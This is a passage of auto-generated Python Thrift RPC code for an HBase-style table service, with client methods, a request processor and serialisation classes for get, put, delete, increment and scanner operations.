if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = putMultiple_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.io is not None:
raise result.io
return
def deleteSingle(self, table, deleteSingle):
"""
Deletes as specified by the TDelete.
Note: "delete" is a reserved keyword and cannot be used in Thrift
thus the inconsistent naming scheme from the other functions.
Parameters:
- table: the table to delete from
- deleteSingle: the TDelete to delete
"""
self.send_deleteSingle(table, deleteSingle)
self.recv_deleteSingle()
def send_deleteSingle(self, table, deleteSingle):
self._oprot.writeMessageBegin('deleteSingle', TMessageType.CALL, self._seqid)
args = deleteSingle_args()
args.table = table
args.deleteSingle = deleteSingle
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_deleteSingle(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = deleteSingle_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.io is not None:
raise result.io
return
def deleteMultiple(self, table, deletes):
"""
Bulk commit a List of TDeletes to the table.
Throws a TIOError if any of the deletes fail.
Always returns an empty list for backwards compatibility.
Parameters:
- table: the table to delete from
- deletes: list of TDeletes to delete
"""
self.send_deleteMultiple(table, deletes)
return self.recv_deleteMultiple()
def send_deleteMultiple(self, table, deletes):
self._oprot.writeMessageBegin('deleteMultiple', TMessageType.CALL, self._seqid)
args = deleteMultiple_args()
args.table = table
args.deletes = deletes
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_deleteMultiple(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = deleteMultiple_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "deleteMultiple failed: unknown result");
def checkAndDelete(self, table, row, family, qualifier, value, deleteSingle):
"""
Atomically checks if a row/family/qualifier value matches the expected
value. If it does, it adds the delete.
@return true if the new delete was executed, false otherwise
Parameters:
- table: to check in and delete from
- row: row to check
- family: column family to check
- qualifier: column qualifier to check
- value: the expected value, if not provided the
check is for the non-existence of the
column in question
- deleteSingle: the TDelete to execute if the check succeeds
"""
self.send_checkAndDelete(table, row, family, qualifier, value, deleteSingle)
return self.recv_checkAndDelete()
def send_checkAndDelete(self, table, row, family, qualifier, value, deleteSingle):
self._oprot.writeMessageBegin('checkAndDelete', TMessageType.CALL, self._seqid)
args = checkAndDelete_args()
args.table = table
args.row = row
args.family = family
args.qualifier = qualifier
args.value = value
args.deleteSingle = deleteSingle
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_checkAndDelete(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = checkAndDelete_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "checkAndDelete failed: unknown result");
def increment(self, table, increment):
"""
Parameters:
- table: the table to increment the value on
- increment: the TIncrement to increment
"""
self.send_increment(table, increment)
return self.recv_increment()
def send_increment(self, table, increment):
self._oprot.writeMessageBegin('increment', TMessageType.CALL, self._seqid)
args = increment_args()
args.table = table
args.increment = increment
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_increment(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = increment_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "increment failed: unknown result");
def openScanner(self, table, scan):
"""
Get a Scanner for the provided TScan object.
@return Scanner Id to be used with other scanner procedures
Parameters:
- table: the table to get the Scanner for
- scan: the scan object to get a Scanner for
"""
self.send_openScanner(table, scan)
return self.recv_openScanner()
def send_openScanner(self, table, scan):
self._oprot.writeMessageBegin('openScanner', TMessageType.CALL, self._seqid)
args = openScanner_args()
args.table = table
args.scan = scan
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_openScanner(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = openScanner_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "openScanner failed: unknown result");
def getScannerRows(self, scannerId, numRows):
"""
Grabs multiple rows from a Scanner.
@return Between zero and numRows TResults
Parameters:
- scannerId: the Id of the Scanner to return rows from. This is an Id returned from the openScanner function.
- numRows: number of rows to return
"""
self.send_getScannerRows(scannerId, numRows)
return self.recv_getScannerRows()
def send_getScannerRows(self, scannerId, numRows):
self._oprot.writeMessageBegin('getScannerRows', TMessageType.CALL, self._seqid)
args = getScannerRows_args()
args.scannerId = scannerId
args.numRows = numRows
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getScannerRows(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getScannerRows_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
if result.ia is not None:
raise result.ia
raise TApplicationException(TApplicationException.MISSING_RESULT, "getScannerRows failed: unknown result");
def closeScanner(self, scannerId):
"""
Closes the scanner. Should be called if you need to close
the Scanner before all results are read.
Exhausted scanners are closed automatically.
Parameters:
- scannerId: the Id of the Scanner to close *
"""
self.send_closeScanner(scannerId)
self.recv_closeScanner()
def send_closeScanner(self, scannerId):
self._oprot.writeMessageBegin('closeScanner', TMessageType.CALL, self._seqid)
args = closeScanner_args()
args.scannerId = scannerId
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_closeScanner(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = closeScanner_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.io is not None:
raise result.io
if result.ia is not None:
raise result.ia
return
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["exists"] = Processor.process_exists
self._processMap["get"] = Processor.process_get
self._processMap["getMultiple"] = Processor.process_getMultiple
self._processMap["put"] = Processor.process_put
self._processMap["checkAndPut"] = Processor.process_checkAndPut
self._processMap["putMultiple"] = Processor.process_putMultiple
self._processMap["deleteSingle"] = Processor.process_deleteSingle
self._processMap["deleteMultiple"] = Processor.process_deleteMultiple
self._processMap["checkAndDelete"] = Processor.process_checkAndDelete
self._processMap["increment"] = Processor.process_increment
self._processMap["openScanner"] = Processor.process_openScanner
self._processMap["getScannerRows"] = Processor.process_getScannerRows
self._processMap["closeScanner"] = Processor.process_closeScanner
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_exists(self, seqid, iprot, oprot):
args = exists_args()
args.read(iprot)
iprot.readMessageEnd()
result = exists_result()
try:
result.success = self._handler.exists(args.table, args.get)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("exists", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get(self, seqid, iprot, oprot):
args = get_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_result()
try:
result.success = self._handler.get(args.table, args.get)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("get", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getMultiple(self, seqid, iprot, oprot):
args = getMultiple_args()
args.read(iprot)
iprot.readMessageEnd()
result = getMultiple_result()
try:
result.success = self._handler.getMultiple(args.table, args.gets)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("getMultiple", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_put(self, seqid, iprot, oprot):
args = put_args()
args.read(iprot)
iprot.readMessageEnd()
result = put_result()
try:
self._handler.put(args.table, args.put)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("put", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_checkAndPut(self, seqid, iprot, oprot):
args = checkAndPut_args()
args.read(iprot)
iprot.readMessageEnd()
result = checkAndPut_result()
try:
result.success = self._handler.checkAndPut(args.table, args.row, args.family, args.qualifier, args.value, args.put)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("checkAndPut", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_putMultiple(self, seqid, iprot, oprot):
args = putMultiple_args()
args.read(iprot)
iprot.readMessageEnd()
result = putMultiple_result()
try:
self._handler.putMultiple(args.table, args.puts)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("putMultiple", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_deleteSingle(self, seqid, iprot, oprot):
args = deleteSingle_args()
args.read(iprot)
iprot.readMessageEnd()
result = deleteSingle_result()
try:
self._handler.deleteSingle(args.table, args.deleteSingle)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("deleteSingle", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_deleteMultiple(self, seqid, iprot, oprot):
args = deleteMultiple_args()
args.read(iprot)
iprot.readMessageEnd()
result = deleteMultiple_result()
try:
result.success = self._handler.deleteMultiple(args.table, args.deletes)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("deleteMultiple", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_checkAndDelete(self, seqid, iprot, oprot):
args = checkAndDelete_args()
args.read(iprot)
iprot.readMessageEnd()
result = checkAndDelete_result()
try:
result.success = self._handler.checkAndDelete(args.table, args.row, args.family, args.qualifier, args.value, args.deleteSingle)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("checkAndDelete", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_increment(self, seqid, iprot, oprot):
args = increment_args()
args.read(iprot)
iprot.readMessageEnd()
result = increment_result()
try:
result.success = self._handler.increment(args.table, args.increment)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("increment", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_openScanner(self, seqid, iprot, oprot):
args = openScanner_args()
args.read(iprot)
iprot.readMessageEnd()
result = openScanner_result()
try:
result.success = self._handler.openScanner(args.table, args.scan)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("openScanner", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getScannerRows(self, seqid, iprot, oprot):
args = getScannerRows_args()
args.read(iprot)
iprot.readMessageEnd()
result = getScannerRows_result()
try:
result.success = self._handler.getScannerRows(args.scannerId, args.numRows)
except TIOError as io:
result.io = io
except TIllegalArgument as ia:
result.ia = ia
oprot.writeMessageBegin("getScannerRows", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_closeScanner(self, seqid, iprot, oprot):
args = closeScanner_args()
args.read(iprot)
iprot.readMessageEnd()
result = closeScanner_result()
try:
self._handler.closeScanner(args.scannerId)
except TIOError as io:
result.io = io
except TIllegalArgument as ia:
result.ia = ia
oprot.writeMessageBegin("closeScanner", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class exists_args:
"""
Attributes:
- table: the table to check on
- get: the TGet to check for
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRUCT, 'get', (TGet, TGet.thrift_spec), None, ), # 2
)
def __init__(self, table=None, get=None,):
self.table = table
self.get = get
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.get = TGet()
self.get.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('exists_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.get is not None:
oprot.writeFieldBegin('get', TType.STRUCT, 2)
self.get.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.get is None:
raise TProtocol.TProtocolException(message='Required field get is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class exists_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('exists_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_args:
"""
Attributes:
- table: the table to get from
- get: the TGet to fetch
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRUCT, 'get', (TGet, TGet.thrift_spec), None, ), # 2
)
def __init__(self, table=None, get=None,):
self.table = table
self.get = get
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.get = TGet()
self.get.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.get is not None:
oprot.writeFieldBegin('get', TType.STRUCT, 2)
self.get.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.get is None:
raise TProtocol.TProtocolException(message='Required field get is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (TResult, TResult.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = TResult()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getMultiple_args:
"""
Attributes:
- table: the table to get from
- gets: a list of TGets to fetch, the Result list
will have the Results at corresponding positions
or null if there was an error
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.LIST, 'gets', (TType.STRUCT,(TGet, TGet.thrift_spec)), None, ), # 2
)
def __init__(self, table=None, gets=None,):
self.table = table
self.gets = gets
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.LIST:
self.gets = []
(_etype45, _size42) = iprot.readListBegin()
for _i46 in xrange(_size42):
_elem47 = TGet()
_elem47.read(iprot)
self.gets.append(_elem47)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getMultiple_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.gets is not None:
oprot.writeFieldBegin('gets', TType.LIST, 2)
oprot.writeListBegin(TType.STRUCT, len(self.gets))
for iter48 in self.gets:
iter48.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.gets is None:
raise TProtocol.TProtocolException(message='Required field gets is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getMultiple_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(TResult, TResult.thrift_spec)), None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype52, _size49) = iprot.readListBegin()
for _i53 in xrange(_size49):
_elem54 = TResult()
_elem54.read(iprot)
self.success.append(_elem54)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getMultiple_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter55 in self.success:
iter55.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class put_args:
"""
Attributes:
- table: the table to put data in
- put: the TPut to put
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRUCT, 'put', (TPut, TPut.thrift_spec), None, ), # 2
)
def __init__(self, table=None, put=None,):
self.table = table
self.put = put
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.put = TPut()
self.put.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('put_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.put is not None:
oprot.writeFieldBegin('put', TType.STRUCT, 2)
self.put.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.put is None:
raise TProtocol.TProtocolException(message='Required field put is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class put_result:
"""
Attributes:
- io
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, io=None,):
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('put_result')
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class checkAndPut_args:
"""
Attributes:
- table: to check in and put to
- row: row to check
- family: column family to check
- qualifier: column qualifier to check
- value: the expected value, if not provided the
check is for the non-existence of the
column in question
- put: the TPut to put if the check succeeds
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRING, 'row', None, None, ), # 2
(3, TType.STRING, 'family', None, None, ), # 3
(4, TType.STRING, 'qualifier', None, None, ), # 4
(5, TType.STRING, 'value', None, None, ), # 5
(6, TType.STRUCT, 'put', (TPut, TPut.thrift_spec), None, ), # 6
)
def __init__(self, table=None, row=None, family=None, qualifier=None, value=None, put=None,):
self.table = table
self.row = row
self.family = family
self.qualifier = qualifier
self.value = value
self.put = put
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.row = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.family = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.qualifier = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.value = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRUCT:
self.put = TPut()
self.put.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
